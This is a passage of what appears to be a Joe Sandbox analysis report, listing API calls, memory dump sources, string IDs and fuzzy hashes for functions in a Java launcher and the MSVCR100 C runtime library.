                                                                                                          • JLI_Launch.JLI(00000000,00000000,00000002,00D03010,00000002,00D03018,1.8.0_92-b14,1.8,?,?,00000001,00000000,00000000,00000000), ref: 00D010C3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612452283.0000000000D01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D00000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612359297.0000000000D00000.00000002.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000009.00000002.30612550523.0000000000D02000.00000004.00000001.01000000.00000008.sdmp
                                                                                                          • Associated: 00000009.00000002.30612649247.0000000000D04000.00000002.00000001.01000000.00000008.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_d00000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Argsprintf$AllocArgcCommandLaunchLinegetenv
                                                                                                          • String ID: 1.8$1.8.0_92-b14$Windows original main args:$_JAVA_LAUNCHER_DEBUG$wwwd_args[%d] = %s
                                                                                                          • API String ID: 436321348-2616121543
                                                                                                          • Opcode ID: b363227ff50e851d0c3ebe6a9e53d65471e83911afebfc6165845d5f00f6fce8
                                                                                                          • Instruction ID: 274134d803065657b79d348a1256c71e2460e0a730679b7e928858e79a6866a9
                                                                                                          • Opcode Fuzzy Hash: b363227ff50e851d0c3ebe6a9e53d65471e83911afebfc6165845d5f00f6fce8
                                                                                                          • Instruction Fuzzy Hash: 6221D279741350AFD320AFA9DC8AF2A7798EB49754B510029F68CC72D1DAB19C84CB71
                                                                                                          APIs
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDFE6FA
                                                                                                          • _calloc_crt.MSVCR100(?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 6FDFE709
                                                                                                          • wcstombs_s.MSVCR100(?,00000000,00000000,?,7FFFFFFF,6FDFE890,00000020), ref: 6FDFE6DF
                                                                                                            • Part of subcall function 6FD85E00: _wcstombs_s_l.MSVCR100(?,?,?,?,?,00000000), ref: 6FD85E16
                                                                                                          • wcstombs_s.MSVCR100(00000000,00000000,?,?,000000FF,00000000,00000000,00000000,00000000,00000000), ref: 6FDFE720
                                                                                                          • free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDFE73B
                                                                                                          • setlocale.MSVCR100(?,00000000,6FDFE890,00000020), ref: 6FDFE74D
                                                                                                          • free.MSVCR100(00000000,?,00000000,6FDFE890,00000020), ref: 6FDFE756
                                                                                                          • _getptd.MSVCR100 ref: 6FDFE763
                                                                                                          • _mbstowcs_s_l.MSVCR100(00000000,00000000,00000000,?,00000000,?), ref: 6FDFE788
                                                                                                          • _malloc_crt.MSVCR100(?), ref: 6FDFE7B9
                                                                                                          • _mbstowcs_s_l.MSVCR100(00000000,00000004,?,?,000000FF,?), ref: 6FDFE7E0
                                                                                                          • _lock.MSVCR100(0000000C), ref: 6FDFE80B
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FDFE821
                                                                                                          • free.MSVCR100(?), ref: 6FDFE82E
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FDFE84E
                                                                                                          • free.MSVCR100(?), ref: 6FDFE85B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$DecrementInterlocked_mbstowcs_s_lwcstombs_s$_calloc_crt_getptd_invoke_watson_lock_malloc_crt_wcstombs_s_lsetlocale
                                                                                                          • String ID:
                                                                                                          • API String ID: 3979222642-0
                                                                                                          • Opcode ID: efac7ac4e46233ad2dd5c98b14e28840ccd7d473b81a875200c6436d1565ac50
                                                                                                          • Instruction ID: 8e2091611b7e1bee84aa7346ef304ee0649568225136c3e3d4b18dd00b096f32
                                                                                                          • Opcode Fuzzy Hash: efac7ac4e46233ad2dd5c98b14e28840ccd7d473b81a875200c6436d1565ac50
                                                                                                          • Instruction Fuzzy Hash: DA51F171D01708EACF91ABA8CC80D9D77F5AF49328B26461BE435D7190E735F9828B20
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _fileno$isleadbytembtowc
                                                                                                          • String ID:
                                                                                                          • API String ID: 3580289129-0
                                                                                                          • Opcode ID: 7a008a6fa1050a22d890e50c9900bb11f37999c18e44a6fba812245d0a792c1f
                                                                                                          • Instruction ID: df1f796cc4d677671377bf3d7b488b683074bfd94477114792fdac916d2ecc9b
                                                                                                          • Opcode Fuzzy Hash: 7a008a6fa1050a22d890e50c9900bb11f37999c18e44a6fba812245d0a792c1f
                                                                                                          • Instruction Fuzzy Hash: 7951F472009B51E9C3A54B78E8046AA7BA89F0373C720471EE4F99B1D1EB35B642C7A4
                                                                                                          APIs
                                                                                                          • _wdupenv_s.MSVCR100(?,00000000,COMSPEC), ref: 6FDD2F1F
                                                                                                            • Part of subcall function 6FD90CD7: _lock.MSVCR100(00000007,6FD90D48,0000000C), ref: 6FD90CE5
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDD2F35
                                                                                                            • Part of subcall function 6FDFAF2C: GetCurrentProcess.KERNEL32(C0000417), ref: 6FDFAF42
                                                                                                            • Part of subcall function 6FDFAF2C: TerminateProcess.KERNEL32(00000000), ref: 6FDFAF49
                                                                                                          • _waccess_s.MSVCR100(?,00000000), ref: 6FDD2F51
                                                                                                          • _errno.MSVCR100 ref: 6FDD2F73
                                                                                                          • _errno.MSVCR100 ref: 6FDD2F7A
                                                                                                          • _wspawnve.MSVCR100(00000000,?,?,00000000), ref: 6FDD2F8A
                                                                                                          • _errno.MSVCR100 ref: 6FDD2F94
                                                                                                          • _errno.MSVCR100 ref: 6FDD2FA7
                                                                                                          • _errno.MSVCR100 ref: 6FDD2FB1
                                                                                                          • _wspawnvpe.MSVCR100(00000000,cmd.exe,?,00000000), ref: 6FDD2FC7
                                                                                                          • free.MSVCR100(?), ref: 6FDD2FD5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$Process$CurrentTerminate_invoke_watson_lock_waccess_s_wdupenv_s_wspawnve_wspawnvpefree
                                                                                                          • String ID: COMSPEC$cmd.exe
                                                                                                          • API String ID: 3564675030-2256226045
                                                                                                          • Opcode ID: 514e83d86b0e9b699e055f3906de213e8457d594f9cb511e80011d12fb67a802
                                                                                                          • Instruction ID: 1300b4d212caa5953fdf513d43a6cab8e1e690ca18385df1776f87b64366b6fb
                                                                                                          • Opcode Fuzzy Hash: 514e83d86b0e9b699e055f3906de213e8457d594f9cb511e80011d12fb67a802
                                                                                                          • Instruction Fuzzy Hash: E62177B1D00314EE8B91AFBA88458AF77B8DF816597110659F811A7250E7307E40C7B1
                                                                                                          APIs
                                                                                                          • _dupenv_s.MSVCR100(?,00000000,COMSPEC), ref: 6FDD264D
                                                                                                            • Part of subcall function 6FDFBAF4: _lock.MSVCR100(00000007,6FDFBBD0,0000000C,6FDD1451,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDFBB02
                                                                                                            • Part of subcall function 6FDFBAF4: _errno.MSVCR100(6FDFBBD0,0000000C,6FDD1451,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDFBB1B
                                                                                                            • Part of subcall function 6FDFBAF4: _invalid_parameter_noinfo.MSVCR100(6FDFBBD0,0000000C,6FDD1451,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDFBB25
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDD2663
                                                                                                            • Part of subcall function 6FDFAF2C: GetCurrentProcess.KERNEL32(C0000417), ref: 6FDFAF42
                                                                                                            • Part of subcall function 6FDFAF2C: TerminateProcess.KERNEL32(00000000), ref: 6FDFAF49
                                                                                                          • _access_s.MSVCR100(?,00000000), ref: 6FDD267F
                                                                                                          • _errno.MSVCR100 ref: 6FDD26A1
                                                                                                          • _errno.MSVCR100 ref: 6FDD26A8
                                                                                                          • _spawnve.MSVCR100(00000000,?,?,00000000), ref: 6FDD26B8
                                                                                                          • _errno.MSVCR100 ref: 6FDD26C2
                                                                                                          • _errno.MSVCR100 ref: 6FDD26D5
                                                                                                          • _errno.MSVCR100 ref: 6FDD26DF
                                                                                                          • _spawnvpe.MSVCR100(00000000,cmd.exe,?,00000000), ref: 6FDD26F5
                                                                                                          • free.MSVCR100(?), ref: 6FDD2703
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$Process$CurrentTerminate_access_s_dupenv_s_invalid_parameter_noinfo_invoke_watson_lock_spawnve_spawnvpefree
                                                                                                          • String ID: COMSPEC$cmd.exe
                                                                                                          • API String ID: 522409749-2256226045
                                                                                                          • Opcode ID: 4b8c6b2a0cf45a3a1c93882e0c8de366fdacc984cf1c072963984b2ddb277659
                                                                                                          • Instruction ID: 49a76a01e2b56bf79684a149ce55758ea2711ffd4ca3885e46d59ca8045df745
                                                                                                          • Opcode Fuzzy Hash: 4b8c6b2a0cf45a3a1c93882e0c8de366fdacc984cf1c072963984b2ddb277659
                                                                                                          • Instruction Fuzzy Hash: 7A21CBB1D00314EF8BA59FA98D41CAF77B8EF81669B210159F810E7280DB307D44DBB1
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100(6FDF8AD8,0000002C,6FDD505A,?,00000400,00000000,6FDD5480,000000A4), ref: 6FDF884B
                                                                                                          • _errno.MSVCR100(6FDF8AD8,0000002C,6FDD505A,?,00000400,00000000,6FDD5480,000000A4), ref: 6FDF8852
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDF8AD8,0000002C,6FDD505A,?,00000400,00000000,6FDD5480,000000A4), ref: 6FDF885D
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • __doserrno.MSVCR100(6FDF8AD8,0000002C,6FDD505A,?,00000400,00000000,6FDD5480,000000A4), ref: 6FDF8881
                                                                                                          • _errno.MSVCR100(6FDF8AD8,0000002C,6FDD505A,?,00000400,00000000,6FDD5480,000000A4), ref: 6FDF8888
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FDF8AD8,0000002C,6FDD505A,?,00000400,00000000,6FDD5480,000000A4), ref: 6FDF8893
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 2983984991-0
                                                                                                          • Opcode ID: 0660d59c05fe4acc257f172e12e7f25b12de10144d6b08667fd581de79945923
                                                                                                          • Instruction ID: 62e76b5cd138e7b0bfad50589d4edb8ebf6ee7737952f9dc56305989310b7bbc
                                                                                                          • Opcode Fuzzy Hash: 0660d59c05fe4acc257f172e12e7f25b12de10144d6b08667fd581de79945923
                                                                                                          • Instruction Fuzzy Hash: CD71D231916359DBCB41DF78C940A9C7BB0BF46328F098259E4619F2D2EB70F902CB61
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$strncat_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 2901470385-0
                                                                                                          • Opcode ID: 2269a83ebe244e794bcdccbfdb45484ffde5428aadb452dbaf33ca0d3dbbf0a2
                                                                                                          • Instruction ID: 585620331b648e9ac4925c05eb31f6b0b3f5e60186970e6e6fa84135d72cdcd9
                                                                                                          • Opcode Fuzzy Hash: 2269a83ebe244e794bcdccbfdb45484ffde5428aadb452dbaf33ca0d3dbbf0a2
                                                                                                          • Instruction Fuzzy Hash: AC81E131905357DBDFA68F68C84479DFBB0AF02328F11565AF8A1AB1C1D731B981CBA1
                                                                                                          APIs
                                                                                                          • memcmp.MSVCR100(?,000000FE), ref: 6FD86A74
                                                                                                          • _getptd.MSVCR100(00000001,00000000), ref: 6FD86AC9
                                                                                                            • Part of subcall function 6FD850C1: _getptd.MSVCR100(00000000,00000000,00000005), ref: 6FD850F7
                                                                                                            • Part of subcall function 6FD850C1: strcpy_s.MSVCR100(00000000,00000000,6FD851A0,00000000,00000000,00000005), ref: 6FD85165
                                                                                                          • strcmp.MSVCR100(?,?,?,?,?,?,00000001,00000000), ref: 6FD86B10
                                                                                                          • strlen.MSVCR100(?,?,?,?,?,00000001,00000000), ref: 6FD86B26
                                                                                                          • _malloc_crt.MSVCR100(-00000005,?,?,?,?,?,00000001,00000000), ref: 6FD86B35
                                                                                                            • Part of subcall function 6FD80B31: malloc.MSVCR100(00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD80B3D
                                                                                                          • memcpy.MSVCR100(?,?,00000006,?,?,?,?,00000001,00000000), ref: 6FD86B83
                                                                                                          • strcpy_s.MSVCR100(?,?,?,?,?,00000006,?,?,?,?,00000001,00000000), ref: 6FD86BAC
                                                                                                          • memcpy.MSVCR100(?,?,00000006,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 6FD86BE6
                                                                                                          • _CRT_RTC_INITW.MSVCR100(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 6FD86C12
                                                                                                          • InterlockedDecrement.KERNEL32(00000000), ref: 6FD86C3B
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6FDB0C5C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _getptdmemcpystrcpy_s$DecrementInterlocked_invoke_watson_malloc_crtmallocmemcmpstrcmpstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2424186890-0
                                                                                                          • Opcode ID: d82c3f1e32fdc02b119a2c7eb9345829e703dc330a454eddba3c17a47e19695a
                                                                                                          • Instruction ID: ba9efc8750a78ba8f1c20e71dcc11e559a84f21755c2d76834f6e51ce6bc1e9c
                                                                                                          • Opcode Fuzzy Hash: d82c3f1e32fdc02b119a2c7eb9345829e703dc330a454eddba3c17a47e19695a
                                                                                                          • Instruction Fuzzy Hash: 7EA11771A102199FDBA5CF28C994BD9B7F5FF0A314F1041AAE55DD7250EB31BA808F50
                                                                                                          APIs
                                                                                                            • Part of subcall function 6FD806FC: GetLastError.KERNEL32(6FD731F8,?,6FD8081A,6FE18032), ref: 6FD80700
                                                                                                            • Part of subcall function 6FD806FC: __set_flsgetvalue.MSVCR100 ref: 6FD8070E
                                                                                                            • Part of subcall function 6FD806FC: SetLastError.KERNEL32(00000000), ref: 6FD80720
                                                                                                          • strcpy_s.MSVCR100(?,00000086,00000000,?), ref: 6FDFEE02
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDFEE17
                                                                                                          • _errno.MSVCR100(?,?,?,6FDFDAC9,00000000,?,00000000), ref: 6FDFEE6E
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,6FDFDAC9,00000000,?,00000000), ref: 6FDFEE78
                                                                                                          • _calloc_crt.MSVCR100(00000086,00000001), ref: 6FDFEDDC
                                                                                                            • Part of subcall function 6FDFC284: __sys_nerr.MSVCR100(?,?,6FDFC33C,00000000), ref: 6FDFC291
                                                                                                            • Part of subcall function 6FDFC284: __sys_nerr.MSVCR100(?,?,6FDFC33C,00000000), ref: 6FDFC29A
                                                                                                            • Part of subcall function 6FDFC284: __sys_errlist.MSVCR100(?,?,6FDFC33C,00000000), ref: 6FDFC2A1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast__sys_nerr$__set_flsgetvalue__sys_errlist_calloc_crt_errno_invalid_parameter_noinfo_invoke_watsonstrcpy_s
                                                                                                          • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                          • API String ID: 3923316158-798102604
                                                                                                          • Opcode ID: 3b90d7bee55cd33a2fef039764ca362bc7fb0f39b68e6a8741d9e830fb1e6e0c
                                                                                                          • Instruction ID: db884ef3720f0146a82fb4c7df7291693238ec055a85d4cfc7394540ec71c6b3
                                                                                                          • Opcode Fuzzy Hash: 3b90d7bee55cd33a2fef039764ca362bc7fb0f39b68e6a8741d9e830fb1e6e0c
                                                                                                          • Instruction Fuzzy Hash: EF41677250B361FBDB519B69AC44CEF7F6DEF02274B120166F418DB181D762B942C3A4
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _fileno$wctomb_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 3498474645-0
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDA7F0
                                                                                                          • _errno.MSVCR100 ref: 6FDDA80F
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDA81A
                                                                                                          • _time64.MSVCR100(?), ref: 6FDDA842
                                                                                                          • _localtime64_s.MSVCR100(?,?), ref: 6FDDA85F
                                                                                                          • _errno.MSVCR100 ref: 6FDDA86A
                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 6FDDA8C1
                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 6FDDA8D9
                                                                                                          • _localtime64_s.MSVCR100(?,?), ref: 6FDDA8E8
                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 6FDDA935
                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 6FDDA943
                                                                                                          • _get_osfhandle.MSVCR100(?,00000000,?,?), ref: 6FDDA956
                                                                                                          • SetFileTime.KERNEL32(00000000,00000000,?,?), ref: 6FDDA95D
                                                                                                          • _errno.MSVCR100 ref: 6FDDA96B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Time$File$_errno$LocalSystem_localtime64_s$_get_osfhandle_invalid_parameter_noinfo_time64
                                                                                                          • String ID:
                                                                                                          • API String ID: 3294488376-0
                                                                                                          APIs
                                                                                                          • _aligned_offset_malloc.MSVCR100(?,?,?), ref: 6FDF6801
                                                                                                            • Part of subcall function 6FDF66D4: _errno.MSVCR100 ref: 6FDF66E4
                                                                                                            • Part of subcall function 6FDF66D4: _invalid_parameter_noinfo.MSVCR100 ref: 6FDF66EF
                                                                                                          • _aligned_free.MSVCR100(?), ref: 6FDF6813
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmp
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _aligned_free_aligned_offset_malloc_errno_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2606453525-0
                                                                                                          APIs
                                                                                                          • ?_ValidateWrite@@YAHPAXI@Z.MSVCR100(?,00000001,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF42D1
                                                                                                          • ?_ValidateWrite@@YAHPAXI@Z.MSVCR100(?,00000001,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF42E2
                                                                                                          • __AdjustPointer.MSVCR100(00000000,-00000008), ref: 6FDF42FE
                                                                                                          • ?_ValidateWrite@@YAHPAXI@Z.MSVCR100(?,00000001,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF4319
                                                                                                          • ?_ValidateWrite@@YAHPAXI@Z.MSVCR100(?,00000001,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF432A
                                                                                                          • memmove.MSVCR100(?,?,?,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003), ref: 6FDF4343
                                                                                                          • ?_ValidateWrite@@YAHPAXI@Z.MSVCR100(?,00000001,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF4366
                                                                                                          • ?_ValidateWrite@@YAHPAXI@Z.MSVCR100(?,00000001,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF4373
                                                                                                          • __AdjustPointer.MSVCR100(?,-00000008,?,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003), ref: 6FDF438B
                                                                                                          • memmove.MSVCR100(?,00000000,?,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003), ref: 6FDF4394
                                                                                                          • ?_ValidateWrite@@YAHPAXI@Z.MSVCR100(?,00000001,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF439E
                                                                                                          • ?_ValidateWrite@@YAHPAXI@Z.MSVCR100(?,00000001,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF43AB
                                                                                                          • ?_ValidateWrite@@YAHPAXI@Z.MSVCR100(?,6FDF43F8,0000000C,6FDF444F,?,?,00000003,00000000,6FDF44A8,00000008,6FDACB2F,?,00000000,00000003,?), ref: 6FDF43B9
